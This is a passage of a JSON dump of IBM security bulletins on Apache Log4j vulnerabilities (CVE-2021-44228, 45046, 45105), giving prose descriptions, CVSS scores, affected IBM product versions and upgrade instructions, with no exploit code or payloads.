fix on top of WAS 8.5.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T04:16:49", "type": "ibm", "title": "Security Bulletin: Due to use of Apache Log4j, IBM StoredIQ for Legal is vulnerable to arbitrary code execution (CVE-2021-44228, CVE-2021-45046) and denial of service (CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-13T04:16:49", "id": "18433120583E82C639DDC6BF1D76EF365C9C500B0A9CC0AE663BA4BE32DC9232", "href": "https://www.ibm.com/support/pages/node/6540518", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:53", "description": "## Summary\n\nIBM Watson Discovery for IBM Cloud Pak for Data contains a vulnerable version of Apache Log4j.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nWatson Discovery| 4.0.0-4.0.4 \nWatson Discovery| 2.0.0-2.2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Watson Discovery 4.0.5 \n\nUpgrade to IBM Watson Discovery 2.2.1 and apply cpd-watson-discovery-2.2.1-patch-7\n\n<https://cloud.ibm.com/docs/discovery-data?topic=discovery-data-install>\n\n<https://www.ibm.com/support/pages/available-patches-watson-discovery-ibm-cloud-pak-data>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-16T03:17:46", "type": "ibm", "title": "Security Bulletin: IBM Watson Discovery for IBM Cloud Pak for Data affected by vulnerability in Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-16T03:17:46", "id": "ECC7277FA4D1E6C0C387927905899E353FF202FB061043E0FC8C0DBCF3150F7E", "href": "https://www.ibm.com/support/pages/node/6538332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:56:51", "description": "## Summary\n\nApache Log4j (CVE-2021-45105 and CVE-2021-45046) is used by the Monitoring component of IBM Cloud Pak for Multicloud Management as part of its logging infrastructure. The fix includes Apache Log4j v2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Cloud Pak for Multicloud Management Monitoring| 2.3 \n \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now** by upgrading to IBM Cloud Pak for Multicloud Management 2.3 Fix Pack 4 by following the instructions at <https://www.ibm.com/docs/en/cloud-paks/cp-management/2.3.x?topic=upgrade-upgrading-fix-pack-3-4>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-18T12:49:17", "type": "ibm", "title": "Security Bulletin: IBM Cloud Pak for Multicloud Management is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-18T12:49:17", "id": "31818542FEE3EBA05F196E3245AADB3A27506A9391A7E39DC666A3A5AAEE4963", "href": "https://www.ibm.com/support/pages/node/6557424", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:54:56", "description": "## Summary\n\nThere is a vulnerability in the Apache Log4j open source library used by IBM Informix Dynamic Server for IBM Informix HQ. IBM Informix Dynamic Server is vulnerable to denial of service (CVE-2021-45105) and remote code execution (CVE-2021-45046) due to Apache Log4j. The fix is included in Apache Log4j 2.17.1. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Informix Dynamic Server| 14.10 \nIBM Informix Dynamic Server| 12.10 \n \n\n\n## Remediation/Fixes\n\n**For 14.10 IBM Informix Dynamic Server** \n\n\n 1. Go to [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&amp;product=ibm/Information+Management/Informix&amp;release=14.10.FC7&amp;platform=All&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=14.10.FC7&platform=All&function=all>)\n 2. Download and install the **14.10.FC7W1** version for your platform which contains the fix in InformixHQ.\n\n**For 12.10 IBM Informix Dynamic Server** \n\n\n 1. Go to [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&amp;product=ibm/Information+Management/Informix&amp;release=12.10.FC15W1&amp;platform=All&amp;function=recommended](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EInformation%20Management&product=ibm/Information+Management/Informix&release=12.10.FC15W1&platform=All&function=recommended>)\n 2. Download and install the **12.10.FC15W1** version for your platform which contains the fix in InformixHQ. \n\nCustomers are encouraged to take immediate action by applying the fix.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-15T13:31:29", "type": "ibm", "title": "Security Bulletin: IBM Informix Dynamic Server is vulnerable to denial of service (CVE-2021-45105) and remote code execution (CVE-2021-45046) due to Apache Log4j", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-15T13:31:29", "id": "10DF4536D86919652FFFFF08E8AC284AF696E6684CAF921DD9F5AB335A3882A9", "href": "https://www.ibm.com/support/pages/node/6572685", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:55:38", "description": "## Summary\n\nApache Log4j is used by IBM Db2 Big SQL as part of its logging infrastructure. IBM Db2 Big SQL is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105). The fix includes Apache Log4j 2.17.1\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nDb2 Big SQL on HDP, CDP| 6.0.0.0 \nDb2 Big SQL on HDP, CDP| 7.1.0.0 \nDb2 Big SQL on Cloud Pak for Data| 7.1.1 (on CP4D 3.5.0) \nDb2 Big SQL on Cloud Pak for Data| 7.2.0 (on CP4D 4.0.0) \nDb2 Big SQL on Cloud Pak for Data| 7.2.1 (on CP4D 4.0.1) \nDb2 Big SQL on Cloud Pak for Data| 7.2.2 (on CP4D 4.0.2) \nDb2 Big SQL on Cloud Pak for Data| 7.2.3 (on CP4D 4.0.3) \n \nHDP is Hortonworks Data Platform\n\nCDP is Cloudera Data Platform Private Cloud\n\n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading Affected Product(s)| Version(s)| Fixes \n---|---|--- \nDb2 Big SQL on Cloud Pak for Data| 7.1.1 (on CP4D 3.5.0)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6237854> \"instructions\" ) to apply Db2 Big SQL on CP4D 3.5 Patch 379 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.0 (on CP4D 4.0.0)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.1 (on CP4D 4.0.1)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.2 (on CP4D 4.0.2)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \nDb2 Big SQL on Cloud Pak for Data| 7.2.3 (on CP4D 4.0.3)| \n\nFollow the [instructions](<https://www.ibm.com/support/pages/node/6527264> \"instructions\" ) to upgrade to Db2 Big SQL 7.2.3 on CP4D 4.0.4 \n \n## Workarounds and Mitigations\n\nIBM strongly suggest addressing the vulnerability now by applying the mitigation below \n\n**Product(s)**| **Version(s)**| \n\n**Remediation/Fix/Instructions** \n \n---|---|--- \nDb2 Big SQL on HDP, CDP| 6.0.0.0| Follow the [instructions](<https://www.ibm.com/support/pages/apar/PH42765> \"instructions\" ) to update the vulnerable library \nDb2 Big SQL on HDP, CDP| 7.1.0.0| Follow the [instructions](<https://www.ibm.com/support/pages/apar/PH42765> \"instructions\" ) to update the vulnerable library \n \nHDP is Hortonworks Data Platform\n\nCDP is Cloudera Data Platform Private Cloud\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:47:00", "type": "ibm", "title": "Security Bulletin: IBM Db2 Big SQL is vulnerable to arbitrary code execution and denial of service due to Apache Log4j (CVE-2021-45046, CVE-2021-45105)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-03-22T16:47:00", "id": "A9B63F0DBA193CFFCFE78E0BFADD5C8ADA02B92500E16CBF9385EE4AB5A92A9F", "href": "https://www.ibm.com/support/pages/node/6565401", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-23T17:57:10", "description": "## Summary\n\nIBM Data Management Platform for EnterpriseDB (EDB) Postgres Enterprise contains a component called EDB failover manager (EFM) and uses a version of log4j that impacts high availability in EDB. The upgraded EFM product contains Apache Log4j 2.17.1.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<https://vulners.com/cve/CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<https://vulners.com/cve/CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Data Management Platform for EDB Postgres Enterprise| 1.0 \nIBM Data Management Platform for EDB Postgres Enterprise | 2.0 \n \n\n\n## Remediation/Fixes\n\nThis applies for all versions listed in this security bulletin: \n\nIf EFM is being used as a quorum / failover strategy for IBM Data Management Platform for EDB Postgres Enterprise, IBM strongly recommends addressing the vulnerability now by upgrading their versions of EFM to EDB Failover Manager version 4.4 which contains Apache Log4j 2.17.1.\n\nIf EFM is not being used no further action is needed.\n\nPlease review for information only - EnterpriseDB's EFM Technical Alert here: <https://support.enterprisedb.com/support/s/detail/a4V2J000001VJn1UAG>\n\n## Workarounds and Mitigations\n\nIBM strongly recommends addressing the vulnerability now by upgrading the version of EFM (if being used) to the latest version 4.4 as noted in the remediation section above.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-02T19:47:50", "type": "ibm", "title": "Security Bulletin: IBM Data Management Platform for EDB Postgres Enterprise